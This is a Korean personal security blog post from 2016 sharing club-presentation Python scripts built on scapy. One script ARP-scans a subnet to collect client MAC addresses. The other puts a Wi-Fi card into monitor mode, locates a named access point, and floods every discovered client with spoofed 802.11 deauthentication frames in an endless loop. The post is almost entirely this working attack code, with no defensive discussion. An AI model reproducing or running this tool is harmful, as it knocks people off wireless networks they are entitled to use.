Notice
Recent Posts
Recent Comments
Link
«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

DeAuth packet attack 본문

Security/Network

DeAuth packet attack

Cdor1 2016. 12. 7. 05:53

동아리 발표 소스이다.

강력한 패킷관련 라이브러리인 scapy모듈을 사용했다.


[*] up.py - arp패킷 활용, online인 호스트와 offline인 호스트 구분


#!/usr/bin/python
from scapy.all import *
import sys

r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
m = '\033[34m' #magenta
c = '\033[36m' #cyan
w = '\033[0m' #white
 
Timeout=1
macTable = []
conf.iface = "wlan0"
conf.verb = 0

def get_mac(ip_address):
        responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
        for s,r in responses:
	    return r.sprintf(r"%Ether.src%")
            #r[Ether].src
            #return 1
        return None
 
def start_scan(ip):
	for i in range(0,255):
		answered,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip+str(i)),timeout=Timeout)
 
		if len(answered) > 0:
			print(y + "[*] IP: "+ip+str(i)+"\n[*] MAC: " + get_mac(ip+str(i)) + w)
			macTable.append(get_mac(ip+str(i)))
    		#print g + answered[0][0].getlayer(ARP).pdst, "is up" + w
		elif len(unanswered) > 0:
    			print r + unanswered[0].getlayer(ARP).pdst, " is down" + w
	print y + "[*] Open: " + str(macTable) + w
	return macTable

[*] ap.py - DeAuth attack 수행


#!/usr/bin/env python
from scapy.all import *
from up import *
from time import *
import sys

r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
m = '\033[34m' #magenta
c = '\033[36m' #cyan
w = '\033[0m' #white

ap_list = []
ap_name = []
ban = []
check = 1

def mode(mode, iface):
        os.system("sudo ifconfig " + iface + " down")
        os.system("sudo iwconfig " + iface + " mode " + mode)
        os.system("sudo ifconfig " + iface + " up")

def PacketHandler(pkt) :
  if pkt.haslayer(Dot11) :
		if pkt.type == 0 and pkt.subtype == 8 :
			if pkt.addr2 not in ap_list :
				ap_list.append(pkt.addr2)
				ap_name.append(pkt.info)
				print m + "[*] AP MAC: %s with SSID: %s " %(pkt.addr2, pkt.info) + w

if len(sys.argv) != 4:
	print "Usage: sudo python2 " + sys.argv[0] + " (Managed mode connected)interface ip ssid"
	print "Example: sudo python2 " + sys.argv[0] + " wlan0 192.168.1. cdor1"
	sys.exit(1)
conf.iface = sys.argv[1]
print(m + "[*] SCAN WIFI..." + w)
ban = start_scan(sys.argv[2])

mode("monitor", sys.argv[1])
while check:
	sniff(iface=sys.argv[1], prn = PacketHandler, count=1)
	for i in range(len(ap_name)):
		if ap_name[i] == sys.argv[3]:
			bssid = ap_list[i]
			check -= 1
print(y + str(ap_name) + w)
print(y + str(ap_list) + w)

myMac = get_if_addr(sys.argv[1])

print(c + "[*] START WIFI DEAUTH ATTACK: " + str(len(ban)) + " CLIENT!")
while 1:
	for i in range(len(ban)):
		if myMac != ban[i]:
			for count in range(10):
				packet = RadioTap()/Dot11(type=0,subtype=12,addr1=ban[i],addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)	
				sendp(packet, iface=sys.argv[1])
				sleep(0.1)
			print(g + "[*] ATTACK CILENT: " + ban[i] + w)
		else:
			print(g + "[*] MY MAC!!!" + w)


공유하기 링크
Comments